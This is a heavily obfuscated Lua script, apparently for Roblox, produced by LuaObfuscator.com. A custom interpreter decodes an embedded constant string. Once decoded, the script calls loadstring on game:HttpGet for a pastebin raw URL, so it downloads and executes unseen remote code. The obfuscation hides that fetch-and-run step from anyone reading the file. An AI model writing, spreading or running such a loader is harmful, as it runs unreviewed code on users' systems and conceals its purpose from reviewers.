--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v110=v5(v83,v19);v19=nil;return v110;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=0;local v85;while true do if (v84==(0 -0)) then v85=(v31/((5 -(120 -(32 + 85)))^(v32-(1 + 0))))%((3 -(1 + 0))^(((v33-(878 -(282 + 132 + 463))) -(v32-((2595 -(892 + 65)) -(1523 + 114)))) + (2 -1))) ;return v85-(v85%(1 -0)) ;end end else local v86=(621 -(555 + 64))^(v32-(1271 -((538 -312) + 1044))) ;return (((v31%(v86 + v86))>=v86) and (932 -(857 + (136 -62)))) or (568 -(367 + 201)) ;end end local function v21() local v34=(0 + 0) -0 ;local v35;while true do if (v34==(351 -(87 + 263))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (181 -(67 + (277 -164))) ;v34=1;end end end local function v22() local v36=0 + 0 ;local v37;local v38;while true do if (v36==(3 -2)) then return (v38 * (1208 -(802 + (1147 -(915 + 82))))) + v37 ;end if (v36==0) then v37,v38=v1(v16,v18,v18 + (5 -3) );v18=v18 + ((8 -5) -(1 + 0)) ;v36=1 + 0 ;end end end local function v23() local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==1) then return (v43 * 16777216) + (v42 * (66723 -(1069 + 118))) + (v41 * ((1371 -(368 + 423)) -324)) + v40 ;end if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + 1 + 2 );v18=v18 + ((18 -12) -2) ;v39=1 + (18 -(10 + 8)) ;end end end local function v24() local v44=v23();local v45=v23();local v46=3 -2 ;local v47=(v20(v45,1 + 0 ,462 -(416 + (1081 -(87 + 968))) ) * ((887 -(261 + 624))^(102 -(1483 -(447 + 966))))) + v44 ;local v48=v20(v45,10 + 11 ,54 -23 );local v49=((v20(v45,(6404 -4949) -(630 + 793) )==(439 -(145 + 293))) and  -(431 -(44 + 386))) or (1487 -(998 + 488)) ;if (v48==(0 + 0)) then if (v47==(0 + 0)) then return v49 * (772 -(201 + 571)) ;else local v93=0 -0 ;while true do if (v93==(1138 -(116 + 1022))) then v48=1914 -(1789 + 124) ;v46=(0 -0) -0 ;break;end end end elseif (v48==(705 + 1342)) then return ((v47==(0 + 0)) and (v49 * (((3 + 0) -2)/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(3632 -2609) ) * (v46 + (v47/((861 -((1839 -1025) + 45))^52))) ;end local function v25(v50) local v51=701 -(376 + 325) ;local v52;local v53;while true do if (v51==(1 -0)) then v52=v3(v16,v18,(v18 + v50) -((1182 -(1123 + 57)) -1) );v18=v18 + v50 ;v51=2;end if (v51==(0 + 0)) then v52=nil;if  not v50 then v50=v23();if (v50==(0 -(0 + 0))) then return "";end end v51=15 -(9 + 5) ;end if (v51==(378 -(85 + 291))) then v53={};for v94=1266 -(243 + 1022) , #v52 do v53[v94]=v2(v1(v3(v52,v94,v94)));end v51=11 -8 ;end if (v51==(3 + 0)) then return v6(v53);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0 -0 ;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do if (v54==(0 + 0)) then local v90=(function() return 0;end)();local v91=(function() return;end)();while true do if (v90~=(402 -(108 + 294))) then else v91=(function() return 114 -(4 + 110) ;end)();while true do if (2~=v91) then else v54=(function() return  #"/";end)();break;end if (v91==0) then v55=(function() return {};end)();v56=(function() return {};end)();v91=(function() return 585 -(57 + 527) ;end)();end if ((1490 -(570 + 919))==v91) then v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v91=(function() return 105 -(17 + 86) ;end)();end end break;end end end if (v54==2) then for v96= #"|",v23() do local v97=(function() return v21();end)();if (v20(v97, #"|", #"\\")~=(0 + 0)) then else local v104=(function() return 0 -0 ;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v104==(1 -0)) then v107=(function() return nil;end)();v108=(function() return nil;end)();v104=(function() return 2;end)();end if (v104==2) then while true do if ((813 -(569 + 242))==v105) then local v160=(function() return 0 -0 ;end)();local v161=(function() return;end)();while true do if (v160~=0) then else v161=(function() return 0 -0 ;end)();while true do if (v161==1) then v105=(function() return  #"19(";end)();break;end if (v161~=(0 + 0)) then else if (v20(v107, #"[", #"]")~= #"|") then else v108[2]=(function() return v60[v108[2]];end)();end if (v20(v107,2,1 + 1 )== #",") then v108[ #"xnx"]=(function() return v60[v108[ #"-19"]];end)();end v161=(function() return 1 -0 ;end)();end end break;end end end if (v105~= #"91(") then else if (v20(v107, #"nil", #"asd")~= #"{") then else v108[ #"0313"]=(function() return v60[v108[ #".com"]];end)();end v55[v96]=(function() return v108;end)();break;end if (v105==(0 + 0)) then local v163=(function() return 65 -(30 + 35) ;end)();local v164=(function() return;end)();while true do if ((1024 -(706 + 318))~=v163) then else v164=(function() return 1251 -(721 + 530) ;end)();while true do if (v164==0) then v106=(function() return v20(v97,1273 -(945 + 326) , #"xnx");end)();v107=(function() return v20(v97, #"http",14 -8 );end)();v164=(function() return 1 + 0 ;end)();end if (v164==(3 -2)) then v105=(function() return  #"<";end)();break;end end break;end end end if (v105== #"/") then local v165=(function() return 0;end)();local v166=(function() return;end)();while true do if (v165~=(1212 -(323 + 889))) then else v166=(function() return 700 -(271 + 429) ;end)();while true do if ((580 -(361 + 219))~=v166) then else v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==(0 + 0)) then local v177=(function() return 1500 -(1408 + 92) ;end)();local v178=(function() return;end)();while true do if (v177~=0) then else v178=(function() return 1086 -(461 + 625) ;end)();while true do if (v178==(1288 -(993 + 295))) then v108[ #"gha"]=(function() return v22();end)();v108[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v106== #".") then v108[ #"gha"]=(function() return v23();end)();elseif (v106==2) then v108[ #"-19"]=(function() return v23() -((1 + 1)^(60 -44)) ;end)();elseif (v106== #"19(") then local v183=(function() return 1171 -(418 + 753) ;end)();while true do if (v183==(0 + 0)) then v108[ #"gha"]=(function() return v23() -((1 + 1)^16) ;end)();v108[ #".dev"]=(function() return v22();end)();break;end end end v166=(function() return 1 + 0 ;end)();end if (v166==1) then v105=(function() return 1 + 1 ;end)();break;end end break;end end end end break;end if (v104==(0 + 0)) then v105=(function() return 529 -(406 + 123) ;end)();v106=(function() return nil;end)();v104=(function() return 127 -(116 + 10) ;end)();end end end end for v98= #"/",v23() do v56[v98-#" " ]=(function() return v28();end)();end return v58;end if (v54== #">") then local v92=(function() return 0 + 0 ;end)();while true do if (2~=v92) then else v54=(function() return 1771 -(1749 + 20) ;end)();break;end if (v92==(1 + 0)) then for v111= #":",v59 do local v112=(function() return 0 -0 ;end)();local v113=(function() return;end)();local v114=(function() return;end)();local v115=(function() return;end)();while true do if (v112==(1 + 0)) then v115=(function() return nil;end)();while true do if (v113== #"!") then if (v114== #">") then v115=(function() return v21()~=(1322 -(1249 + 73)) ;end)();elseif (v114==2) then v115=(function() return v24();end)();elseif (v114== #"asd") then v115=(function() return v25();end)();end v60[v111]=(function() return v115;end)();break;end if (v113~=(0 + 0)) then else local v171=(function() return 0;end)();local v172=(function() return;end)();while true do if (v171==(0 + 0)) then v172=(function() return 1145 -(466 + 679) ;end)();while true do if (v172==(0 -0)) then v114=(function() return v21();end)();v115=(function() return nil;end)();v172=(function() return 2 -1 ;end)();end if (v172==(2 -1)) then v113=(function() return  #"{";end)();break;end end break;end end end end break;end if (v112==0) then local v155=(function() return 1900 -(106 + 1794) ;end)();while true do if (v155==(0 -0)) then local v173=(function() return 0 + 0 ;end)();while true do if (v173~=1) then else v155=(function() return 1;end)();break;end if (v173==(0 -0)) then v113=(function() return 0;end)();v114=(function() return nil;end)();v173=(function() return 1;end)();end end end if (v155~=1) then else v112=(function() return 378 -(142 + 235) ;end)();break;end end end end end v58[ #"gha"]=(function() return v21();end)();v92=(function() return 1 + 1 ;end)();end if (v92~=0) then else v59=(function() return v23();end)();v60=(function() return {};end)();v92=(function() return 2 -1 ;end)();end end end end end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[1 + 1 ];local v66=v61[980 -(553 + 424) ];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1 -0 ;local v72= -(1 + 0);local v73={};local v74={...};local v75=v12("#",...) -(1 + 0) ;local v76={};local v77={};for v87=0 + 0 ,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 + 0 ];else v77[v87]=v74[v87 + (2 -1) ];end end local v78=(v75-v69) + (2 -1) ;local v79;local v80;while true do v79=v67[v71];v80=v79[2 -1 ];if ((2166<=4740) and (v80<=(6 -3))) then if (v80<=(1 + 0)) then if (v80>(0 -0)) then local v116;local v117,v118;local v119;local v120;v77[v79[2]]={};v71=v71 + 1 ;v79=v67[v71];v77[v79[755 -(239 + 514) ]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[1 + (1 -0) ]]=v63[v79[1332 -(797 + 532) ]];v71=v71 + 1 + 0 ;v79=v67[v71];v120=v79[(1093 -(975 + 117)) + 1 ];v119=v77[v79[6 -3 ]];v77[v120 + (1203 -(373 + (2704 -(157 + 1718)))) ]=v119;v77[v120]=v119[v79[735 -(387 + 89 + 255) ]];v71=v71 + (1131 -(369 + (2701 -1940))) ;v79=v67[v71];v77[v79[(6 -4) + 0 ]]=v79[5 -2 ];v71=v71 + (1 -0) ;v79=v67[v71];v120=v79[240 -(64 + 174) ];v117,v118=v70(v77[v120](v13(v77,v120 + 1 + 0 ,v79[3])));v72=(v118 + v120) -1 ;v116=0 -0 ;for v152=v120,v72 do v116=v116 + (337 -(144 + 192)) ;v77[v152]=v117[v116];end v71=v71 + (217 -(42 + 174)) ;v79=v67[v71];v120=v79[2];v77[v120]=v77[v120](v13(v77,v120 + 1 + 0 ,v72));v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 + 0 ;v79=v67[v71];do return;end else local v136=v79[1506 -(363 + (2159 -(697 + 321))) ];local v137=v77[v79[1583 -((3222 -2039) + 397) ]];v77[v136 + (2 -1) ]=v137;v77[v136]=v137[v79[3 + 1 ]];end elseif (v80==(2 + 0)) then v77[v79[1977 -((4052 -2139) + 62) ]]=v63[v79[2 + 1 ]];else local v143=0 -0 ;local v144;local v145;local v146;local v147;while true do if (v143==(1933 -(565 + 1368))) then v144=v79[(15 -8) -5 ];v145,v146=v70(v77[v144](v13(v77,v144 + (1662 -(1477 + 72 + 112)) ,v79[3 -0 ])));v143=1;end if ((1283<=4997) and (v143==2)) then for v167=v144,v72 do v147=v147 + 1 ;v77[v167]=v145[v147];end break;end if (v143==(1 + 0)) then v72=(v146 + v144) -(857 -(564 + 292)) ;v147=0 -(0 -0) ;v143=5 -3 ;end end end elseif ((v80<=(309 -(244 + 60))) or (3002<2579)) then if (v80>(4 + 0)) then v77[v79[478 -(41 + 435) ]]=v79[7 -4 ];else local v150=(2228 -(322 + 905)) -(938 + 63) ;local v151;while true do if (((0 + 0)==v150) or (678>4744)) then v151=v79[1127 -(936 + 189) ];v77[v151]=v77[v151](v13(v77,v151 + 1 + 0 ,v72));break;end end end elseif ((4342>3456) and (v80<=(1619 -(1565 + 48)))) then v77[v79[2]]();elseif (v80>(5 + 2)) then v77[v79[1140 -(782 + 356) ]]={};else do return;end end v71=v71 + (268 -(176 + (702 -(602 + 9)))) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F413762306D47326200094Q00017Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
